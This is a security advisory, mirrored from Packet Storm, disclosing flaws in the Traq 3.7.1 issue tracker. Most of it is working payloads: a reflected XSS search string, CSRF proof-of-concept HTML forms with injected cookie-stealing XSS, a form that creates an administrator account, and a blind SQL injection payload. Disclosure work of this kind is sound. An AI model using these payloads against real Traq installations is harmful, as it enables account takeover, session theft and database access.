Lucene search
K

Traq 3.7.1 CSRF / XSS / SQL Injection

🗓️ 22 Oct 2018 00:00:00Reported by Matt LandersType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Traq 3.7.1 vulnerability to CSRF, XSS, SQL Injection, Lack of session timeout, Admin account creation via CSR

Code
`=================================================  
  
Synopsis: Traq vulnerable to XSS, Admin account creation CSRF, SQL Injection, Lack of session timeout.  
Product: Traq  
Version: 3.7.1  
Vendor site: https://traq.io/  
Researcher: Matt Landers  
[email protected]  
twitter.com/matthewjland  
https://mjlanders.org/  
  
=================================================  
  
1: Username enumeration via  
http://example.com/home/example/public_html/traq/users/1 = admin  
http://example.com/home/example/public_html/traq/users/2 = anonymous  
http://example.com/home/example/public_html/traq/users/3 = user etc etc  
  
  
2: Reflected XSS  
A GET reflected XSS appears in the search parameter of the following request.  
https://example.com/traq/tickets?search="><Script>alert(document.domain)</Script>  
  
  
3: CSRF - XSS  
This was a post XSS combined with a csrf vulnerability in the email parameter in the following request.  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://example.com/home/public_html/traq/usercp" method="POST">  
<input type="hidden" name="name" value="Administrator" />  
<input type="hidden" name="email" value="tt1kr"><img src=a onerror=alert(document.cookie)>awezh" />  
<input type="hidden" name="watch_created_tickets" value="1" />  
<input type="hidden" name="locale" value="enus" />  
<input type="hidden" name="submit" value="Save" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
4: CSRF - XSS  
This was a post XSS combined with a csrf vulnerability in the name and email parameter in the following request.  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">  
<input type="hidden" name="username" value="user1" />  
<input type="hidden" name="name" value="guyj"><img src=a onerror=alert(document.domain)>mztcr" />  
<input type="hidden" name="password" value="userpass" />  
<input type="hidden" name="email" value="[email protected]"><img src=a onerror=alert(document.cookie)>jj194" />  
<input type="hidden" name="group_id" value="2" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
5: Admin user creation via CSRF in the same request as the above mentioned item 4. The xss could be used to notify the attacker when the admin triggers the csrf, the admin account is created by setting the group id to 1 in this request.  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://example.com/home/public_html/traq/admin/users/new?overlay=true" method="POST">  
<input type="hidden" name="username" value="testadmin" />  
<input type="hidden" name="name" value="guy smiley" />  
<input type="hidden" name="password" value="testadmin" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="group_id" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
6: SQL Injection via the search parameter, I was able to have sqlmap return with the database current user and database type. The following is the sql injection I used in order to achieve this.  
  
Parameter: search (URI)  
Type: boolean-based blind  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: http://example.com:80/home/example/public_html/traq/dfgdfg/tickets?search=') RLIKE (SELECT (CASE WHEN (6383=6383) THEN '' ELSE 0x28 END)) AND ('yDch'='yDch&order_by=component.asc  
  
  
7: There appears to be no session timeout, admin account stayed logged in for two days.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation